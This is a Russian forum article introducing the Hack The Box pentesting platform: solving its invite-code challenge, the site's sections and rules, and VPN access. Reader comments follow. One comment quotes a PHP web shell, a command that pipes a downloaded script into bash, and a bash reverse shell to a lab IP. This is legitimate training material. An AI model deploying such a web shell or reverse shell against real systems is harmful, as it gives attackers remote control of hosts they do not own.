• Приглашаем на KubanCTF

    Старт соревнований 14 сентября в 10:00 по москве

    Ссылка на регистрацию в соревнованиях Kuban CTF: kubanctf.ru

    Кодебай является технологическим партнером мероприятия

Статья Hack The Box - все об онлайн лаборатории для пентеста, часть 1

Полное руководство на русском языке о Hack The Box Pen-testing Labs.

Всем привет. В недавнем времени захотел попрактиковаться в сфере пентеста. Долго искал и выбирал площадки. Выбирал среди этих:
  • Игры Кодебай | CTF-платформа (площадка добавлена в конце 2022 года)
По названию статьи ты наверное понимаешь, что я выбрал последнее. Так началось мое знакомство с этим сайтом.

Для начала нам стоит разобраться что вообще сайт из себя представляет. Hack The Box или HTB - это онлайн платформа, позволяющая вам проверить свои навыки тестирования на проникновение и обменяться идеями и методологиями с тысячами людей в области безопасности.

Мое знакомство началось с регистрации. Прочитав на сайте фразу: “Click below to hack our invite challenge, then get started on one of our many live machines or challenges”. Тут уже и начинается наше обучение.

Регистрируемся на Hack The Box:
  1. Переходим на страницу с вводом инвайт кода, нажав кнопку “Join”. Перед нами будет такое окошко:
28265


Процесс получения кода:
Сначала попробуй сам это сделать, а если не получится, тогда открывай спойлер!
  1. Откройте инструменты разработчика.
28266


Решение нашей задачи начинается с просмотра исходного кода страницы. Внимание уделять нужно: скриптам и подключенным файлам. В нашем случае был найден файл: “/js/inviteapi.min.js
”. Тут на подсказывает слово invite и api - программный интерфейс приложения.

28267


2. Просмотр скрипта и его анализ.

28268


На последней строке мы видим набор функций. Код может может тяжело читаться из-за сжатия, но можно использовать сервисы для улучшения его читабельности:
Тут много интересных функций, но есть одна, которая идеально для нас подходит: makeInviteCode, что в переводе - создать инвайт код.

Эти функции можно использовать в консоли браузера. Переходим обратно на страницу, где подключен этот скрипт.

3. Переходим в консоль и используем функцию. Консоль находится в инструментах разработчика.

28269


По факту мы получили свой код. Он записан в кодировке Base64. Мы можем убедиться в этом нажав на стрелочку рядом с data.

28270


Давайте преобразуем это в обычный нам вид. Я использую сервис:
Вставляем наш код и жмём Decode. На тему кодировок мы с вами ещё позже поговорим более подробно.

28271


Нам написало, что мы должны отправить Post запрос по ссылке:
Для упрощения жизни и использовал сайт:
Вы можете также создать свой отправитель POST запросов:
Вводим нашу ссылку и жмем поехали.

28272


Получаем ответ на запрос. Мы видим закодированный инвайт код:
Tk9IV1AtTVJFQ1ctQVVLWUwtVkREQVAtWEhUUkk=
28273


Переходим на сайт для декодирования. И из Base64 получаем полноценный инвайт код:

28274


У вас будет свой индивидуальный инвайт код. Код, который сайт выдал мне не подойдёт вашему аккаунту. Думаю зарегистрироваться с ним вы сможете сами.
После регистрации мы с вами проведем обзор меню:

28275


Dashboard
Главная страница. На ней отображается:
  • Количество работающих машин
  • Онлайн сайта
  • Скорость ответа
  • Количество новых пользователей
  • Активные сервера
  • Лучшие пентестеры
  • И многое другое…
Раздел может понадобиться для просмотра активных серверов. Остальная информация бессмысленна.

Other
Подразделы:
  • Правила
  • Последние изменения
  • Достижения
  • Пожелания
  • Объявления
  • Поддержка
Всё используется очень редко. Перед началом работы с сайтом рекомендую прочитать правила:
  1. Вам не нужно никому сообщать о способах "взлома" кода приглашения. Я нарушил, но это во благо общества :).
  2. Не пытайтесь взломать что-либо кроме HTB Network. Сеть HTB - 10.10.10.0/24 (10.10.10.1-10.10.10.254). Ограничьте всё свое любопытство в этой конкретной подсети.
  3. Не взламывайте машины не в нашей подсети. Это не конец света, если вы попытаетесь взломать шлюзы и другие узлы в сети HTB (10.10.10.0/24), но если вам это удастся, не наносите ущерба и сообщите нам как можно скорее.
  4. Любая форма DoS (отказ в обслуживании) запрещена. Нет причин использовать любую форму DoS на любом компьютере внутри или за пределами сети HTB. Если вы случайно совершите такую атаку, сообщите нам как можно скорее.
  5. Не пытайтесь взломать других участников. Сеть построена таким образом, что прямая связь между двумя системами-участниками запрещена. Несмотря на то, что существуют способы атаковать другого участника, нападение или даже подключение к клиентам другого участника строго запрещено.
  6. Не используйте свой рабочий компьютер для подключения к сети HTB. Мы настоятельно рекомендуем не использовать ваш рабочий ПК для подключения к сети HTB. Создайте виртуальную или физическую систему только для этой цели. Сеть HTB заполнена энтузиастами безопасности, у которых есть навыки и наборы инструментов для взлома систем, и независимо от того, как сильно мы пытаемся защитить вас, мы, скорее всего, потерпим неудачу: P.S. Мы не несем никакой ответственности за любой ущерб, кражу или потерю личных данных. хотя в таком случае мы будем в полной мере сотрудничать с властями.
  7. Не делитесь тем, как вы взломали каждую машину с другими участниками. Это включает генерацию кода приглашения и все машины.
Universities
Университеты, которые сотрудничают с Hack The Box. Среди них даже есть наш: МИЭРА

1553963961553-png.28276


Looking for job?
Проходим мимо этот раздел и последующие 2.

Hall of fame - Зал славы
Попав сюда вы можете считать себя неплохим пентестером, но не более)

Team Rankings…Pro Lab Rankings
Такие-же топы. Идём дальше.

Access
Страница скачивания конфигурации для OpenVPN. С помощью нее мы будет получать доступ к машинам. Позже мы подробнее разберём этот раздел.

Machines
Пожалуй самый интересный раздел. Тут и будет все начинаться… Делится на несколько подкатегорий:
  • Active - Активные машины
Разберём этот раздел поподробнее. Я выделю столбцы, которые будут нужны при выборе машины.

28277


IP Address - понадобится нам для подключения получения доступа к машине. У каждой он индивидуален.

Difficulty - сложность. Мы с вами будем идти по нарастающей. По своему опыту могу сказать, что лёгкие машины не всегда так просты, как кажутся.

OS - один из самых важных факторов. Мы с вами будем ориентироваться на Linux системы из-за их большей популярности.

Также мы можем перейти к подробным данным о машине, нажав на её название. Там отображаются такие данные как:
  • Диаграмма получения доступов к машине
  • Количество очков за получение доступа
  • Время жизни машины
  • Количество людей, получивших user.txt и root.txt
  • Retired - Уже пройденные (В отставке)
Очень хороший раздел для новичков. Почти у каждой машины есть видео-прохождение каналом ippsec на английском языке. Подробнее вы можете ознакомиться по ссылке: IppSec

28278


Во второй части мы как раз будем разбирать одно из видео, чтобы понять последовательность действий для прохождения машины. После просмотра 10-20 таких машин вы сможете самостоятельно попробовать получить доступ.

Главное уметь анализировать действия продвинутых пентестеров, тогда вы сможете понять правильную последовательность действий для быстрого получения доступа.
  • Unreleased - Ещё не выпущенные машины. (Пока на стадии тестирования)
  • Owned - Машины, к которым вы получили доступ.
  • Submissions - Машины, опубликованные людьми.
  • New Submission - Страница публикации собственной машины.
Когда вы становитесь хорошим пентестером, вам хочется чего-то большего, чем проходить чужие машины. Тут вам и понадобится данный раздел.

Challenges
Это как-бы мини игры, но тут есть и задания для продвинутых пользователей. Разделы:
  • Reversing - Реверсивные задания
  • Crypto - Задания по криптографии
  • Stego - Задания по стеганографии
  • Pwn - Задачи связаны с бинарной эксплуатацией
  • Web - Поиск уязвимостей на веб сайтах
  • Misc - Разные задания
  • Forensics - задания на форензику
  • Mobile - Мобильный пентест
  • Submissions - Задания, опубликованные людьми.
  • New Submission - Создать свое задание.
End game → P.O.O - Professional Offensive Operations
Раздел доступен для людей выше ранга Guru.
Задача - получить доступ к хосту, повысить привелегии и получить доступ к домену, захватывая флаги по пути.

Раздел предназначен для профессионалов в своём деле. Режим похож на CT. Сам не проходил. Много рассказать о этой машине не могу.

Pro Labs → RastaLabs
RastaLabs - это захватывающая среда Windows Active Directory, средство обучения и оттачивания ваших навыков пентестинга. Чтобы победить вам, потребуется ряд навыков, в том числе:
  • OSINT и навыки фишинга
  • Умение локально повышать привилегии
  • Настойчивость
  • У меня использовать эксплоиты и уязвимости
  • Знание разнообразных методик обхода защиты
  • Умение создавать експлоиты
  • Креативное мышление
  • Терпение и настойчивость
Цель лаборатории - связаться с администратором домена и собрать все флаги.

ProLabs → OffShore
Вы агент, которому поручено разоблачать операции по отмыванию денег в оффшорном международном банке. Взломайте DMZ и исследуйте внутреннюю сеть, чтобы найти защищенные базы данных банка и потрясающий список международных клиентов. OFFSHORE предназначен для имитации реального теста на проникновение, начиная с внешней позиции в Интернете и заканчивая укреплением в моделируемой корпоративной сети Windows Active Directory. Эта лаборатория предназначена для ознакомления участников с:
  • Атакой веб-приложений
  • Использованием распространенных недостатков Active Directory
  • Локальным повышением привилегий
  • Умением обходить защиту и умением входить в доверие
  • Уклонением от защиты конечных точек
  • Социальной инженерией
  • Нестандартным мышлением
У игроков будет возможность атаковать 16 хостов различных типов и версий операционных систем, чтобы получить 29 флагов в реалистичной лабораторной среде Active Directory с различными отдельными задачами, скрытыми повсюду. Лаборатория Active Directory имитирует внешний вид реальной корпоративной сети, дополненной очень активными симулированными пользователями и другими элементами занятого предприятия.

Private Messages
Здесь мы отправляем личные ообщения другим пользователям или начинаем групповой чат.

Shoutbox
Все, что вы здесь напишите, увидят все участники Hack The Box ...

Forum
Сюда обычно надо обращаться за помощью, но тут запрещено сразу говорить ответы. Задав вопрос, опытные пользователи намекнуть вам на правильное направление.

VIP Subscription - Вип подписка
Начиная деятельность на этом сайте я знал о существовании Vip подписки, но не уделял ей внимания. В основном это было из-за цены и непонимсния, что она даёт, а даёт она следующее:
  • Преимущества VIP подписки
  • Менее многолюдные лаборатории
  • Доступ в лабораторию ко всем машинам, вышедшим на пенсию (20 в неделю)
  • Доступ к официальным документация для выбывших машин
  • Переключение между лабораторными серверами США / ЕС
  • Отдельные рейтинги, включая выбывшие машины
  • Неограниченные сбросы
Думаю, вы заметили выделенный пункт. Это просто бомбезная штука. Почти у каждой машины после “отставки” есть документация, в которой по полочкам разложено прохождение машины. Об этой фиче я узнал, когда мне дали ее бесплатно.

28279


Курсивом выделен не менее годный плюс випа. Машины, которые уходят в “отставку” уже пройдены многими пользователями и их прохождение в 90% случаев уже есть. Это позволяет новичку в случае трудностей подсмотреть, а не долго искать ответы на свои вопросы. Многие скажут, что это минус, и я не смогу это отрицать, потому что именно умение поиска нужной вам информации повышает ваш профессионализм.

Я ни в коем случае не продаю вам вип. Без него можно спокойно обучаться пентесту и стать гуру.

Подключение к VPN
Переходим во вкладку Acess. Вот что нам предлагает сам HTB:
  1. Установите софт для управления виртуальными машинами, такими как Virtual Box, VMWare Machine или любую другую программу.
  2. Создайте виртуальную машину на Linux. Вы можете использовать дистрибутивы, созданные для пентесту, такие как Kali Linux, Parrot OS. Можете создать свою личную сборку. Мы настоятельно не рекомендуем использовать Windows для совершения атак на наши машины.
  3. Скачайте ваш личный конфигурационный файл.
  4. Запустите команду openvpn [filename].opvn в терминале.
  5. Удачи! Вы можете найти IP адрес машины для атаки на странице
Это конец первой части. В следующей части мы с вами будем проходить и анализировать одну из машин HTB, подключаться наглядно к VPN и так далее.

Читать продолжение Hack The Box - вторая часть руководства, в которой проанализируем несколько машин из HTB
 

Вложения

  • 1553963961553.png
    1553963961553.png
    293,7 КБ · Просмотры: 24 117

jonni_vu

Green Team
24.06.2017
43
8
BIT
0
Можно вопрос в этой ветке . т.к он касается прохождения одной из задач HTB. Вообщем господин с
с канала IppSec показывал как сайт на Joomla через файл .php который как я понял является функцией запуска программы
<?php system($_REQUEST['AndComment']); ?> , должен отпрвиться скрипт .sh с атакующей машины. Делает он это с помощью
SimpleHTTPServer. И в последствии когда загрузка скрипта прошла , слушает неткатом. У меня не как не получается этот момент загрузки, хотя
все делаю так же. Может какой другой вариант опробовать , подскажите. Ввожу в адресное окно свой ip/.sh все работает. но с сайтом дело не проходит.

10.10.10.150/templates/protostar/boomba.php?AndComment=curl 10.8.0.1/cat.sh | bash
так я пытаюсь запустить .sh скрипт. , где boomba.php это <?php system($_REQUEST['AndComment']); ?> ,a
у меня на /www cat.sh - bash -i >& /dev/tcp/10.8.0.1/9696 0>&1

root@kali ~/N/c/www# python -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 ...

и жду. Менял и порта и переписывал команды.
 
K

k2d3

Благодарю. Как раз то что я искал. Теории начитался много,как раз время переходить к практике)

Вопрос к знатокам: с виртуалки не удобно работать. Можно ли конектиться с обычной системы и чем "плохим" это может закончиться?)
 
С

советчик

не коннекться с реальной машины - похакают в момент, а виртуалку не жалко
 

Valera1976

New member
11.09.2017
4
0
BIT
0
Автору респект, спасибо за подробное описание!
P.s. и за инвайт код отдельное спасибо!
 

ImFelix

New member
23.03.2019
4
0
BIT
0
Не подскажите с чего начать или почитать чтобы узнать инвайт код, охото самому найти
 

Dit81

One Level
21.07.2019
9
1
BIT
0
Здорово! Для начинающих самое-то, буду рекомендовать :)
 

Cyb3rLux

New member
09.10.2019
1
0
BIT
0
Спасибо! Полезная статья. А вторая часть, как я понимаю, в премиум доступе уже? )
 

Egor1912

New member
10.01.2020
3
0
BIT
0
А если подключиться не с виртуалки, а с Live USB, тоже прощай комп?
 

bpk root

New member
16.12.2019
4
0
BIT
37
Помогите, я запутался.... задание на HackTheBox называется USAGE ip 10.10.11.18 Так вот теперь проблема. 1. ip адрес 10.10.11.18 пингуется. 2. добавлен в hosts 10.10.11.18 usage.htb.
3. На usage.htb тоже пинг проходит.4. САЙТ НЕ ОТКРЫВАЕТСЯ!!!!
p.s. уже начал смотреть прохождение, смотреть прохождение у других, на форумах разных. везде одно и тоже. Шаги мои проделаны правильно. Но вот у всех он открывается, а меня НЕТ!!!
можно было бы предположить, что из-за того что из России. НО я же подключаюсь по VPN.
в общем я не знаю что дальше делать....
Ах да. Это не только на этом задании. задание SEA так же не открывается сайт. И Redeemer там немного другое. не пройти последний шаг.
где надо подключиться уже к redis-cli -h IP , висит на попытке подключения. при попытки перегрузить машину он соединяется, но сразу теряет коннект т.к. машина в ребуте.

Заранее Спасибо! Буду признателен если хоть чем то поможете, подскажите направление куда копать(если это возможно)
 

N1GGA

Codeby Team
Администратор
16.07.2018
357
350
BIT
407
Помогите, я запутался.... задание на HackTheBox называется USAGE ip 10.10.11.18 Так вот теперь проблема. 1. ip адрес 10.10.11.18 пингуется. 2. добавлен в hosts 10.10.11.18 usage.htb.
3. На usage.htb тоже пинг проходит.4. САЙТ НЕ ОТКРЫВАЕТСЯ!!!!
p.s. уже начал смотреть прохождение, смотреть прохождение у других, на форумах разных. везде одно и тоже. Шаги мои проделаны правильно. Но вот у всех он открывается, а меня НЕТ!!!
можно было бы предположить, что из-за того что из России. НО я же подключаюсь по VPN.
в общем я не знаю что дальше делать....
Ах да. Это не только на этом задании. задание SEA так же не открывается сайт. И Redeemer там немного другое. не пройти последний шаг.
где надо подключиться уже к redis-cli -h IP , висит на попытке подключения. при попытки перегрузить машину он соединяется, но сразу теряет коннект т.к. машина в ребуте.

Заранее Спасибо! Буду признателен если хоть чем то поможете, подскажите направление куда копать(если это возможно)
Может веб-морда не на стандартном 80 порту? И проверь с curl
curl -X GET http://usage.htb

Ну и

curl -X GET http://usage.htb -H 'Host: 10.10.11.18'
 

bpk root

New member
16.12.2019
4
0
BIT
37
Может веб-морда не на стандартном 80 порту? И проверь с curl
curl -X GET http://usage.htb

Ну и

curl -X GET http://usage.htb -H 'Host: 10.10.11.18'
curl -X GET -Просто висит

curl -X GET -H 'Host: 10.10.11.18' отдаёт (301 Moved Permanently)

Тут другая ситуёвина, пришёл я на работу, запустил там parrot,так там всё норм, обе машины закончил без проблем.
по GET запросам тоже нет проблем
Пришел домой, переставил parrot с нуля, ну мало ли чего. Тот же результат

p.s. Я в панике =((
 

N1GGA

Codeby Team
Администратор
16.07.2018
357
350
BIT
407
curl -X GET -Просто висит

curl -X GET -H 'Host: 10.10.11.18' отдаёт (301 Moved Permanently)

Тут другая ситуёвина, пришёл я на работу, запустил там parrot,так там всё норм, обе машины закончил без проблем.
по GET запросам тоже нет проблем
Пришел домой, переставил parrot с нуля, ну мало ли чего. Тот же результат

p.s. Я в панике =((

Мб провайдер блочит VPN?
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!